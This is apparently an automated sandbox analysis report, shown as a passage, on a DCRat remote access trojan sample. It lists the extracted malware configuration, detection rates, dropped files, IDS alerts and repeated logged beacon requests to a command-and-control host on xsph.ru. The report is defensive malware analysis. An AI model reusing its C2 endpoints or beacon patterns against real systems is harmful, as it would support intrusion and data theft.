            Source: 00000005.00000002.1480370070.000000001344D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"A\":\"#\",\"L\":\"|\",\"N\":\"*\",\"I\":\".\",\"K\":\"&\",\"y\":\"-\",\"U\":\"_\",\"n\":\",\",\"R\":\"(\",\"M\":\")\",\"J\":\"@\",\"T\":\"<\",\"6\":\"%\",\"e\":\"$\",\"Z\":\"`\",\"X\":\";\",\"0\":\"^\",\"i\":\">\",\"F\":\"~\",\"C\":\" \",\"d\":\"!\"}", "PCRT": "{\"x\":\"(\",\"1\":\"|\",\"Z\":\"$\",\"Q\":\"%\",\"l\":\"&\",\"B\":\"<\",\"V\":\"@\",\"M\":\"`\",\"3\":\">\",\"U\":\"-\",\"i\":\"!\",\"K\":\",\",\"5\":\".\",\"k\":\" \",\"H\":\";\",\"a\":\"_\",\"E\":\"^\",\"0\":\"*\",\"F\":\"#\",\"r\":\"~\",\"L\":\")\"}", "TAG": "", "MUTEX": "DCR_MUTEX-3iI7MItHmWcowgxJeEuX", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exeReversingLabs: Detection: 87%
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeReversingLabs: Detection: 87%
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeReversingLabs: Detection: 87%
            Multi AV Scanner detection for submitted file
            Source: adKGhCOOzg.exeReversingLabs: Detection: 71%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeJoe Sandbox ML: detected
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: adKGhCOOzg.exeJoe Sandbox ML: detected
            Source: adKGhCOOzg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: adKGhCOOzg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: adKGhCOOzg.exe
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0034A5F4
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0035B8E0
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036AAA8 FindFirstFileExA,0_2_0036AAA8
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\userJump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49718 -> 141.8.194.149:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49716 -> 141.8.194.149:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49720 -> 141.8.194.149:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49714 -> 141.8.194.149:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49719 -> 141.8.194.149:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49715 -> 141.8.194.149:80
            Source: Joe Sandbox ViewIP Address: 141.8.194.149 141.8.194.149
            Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1025223.xsph.ru
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1025223.xsph.ru
            Source: global trafficDNS traffic detected: DNS query: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 Sep 2024 06:42:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 Sep 2024 06:42:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 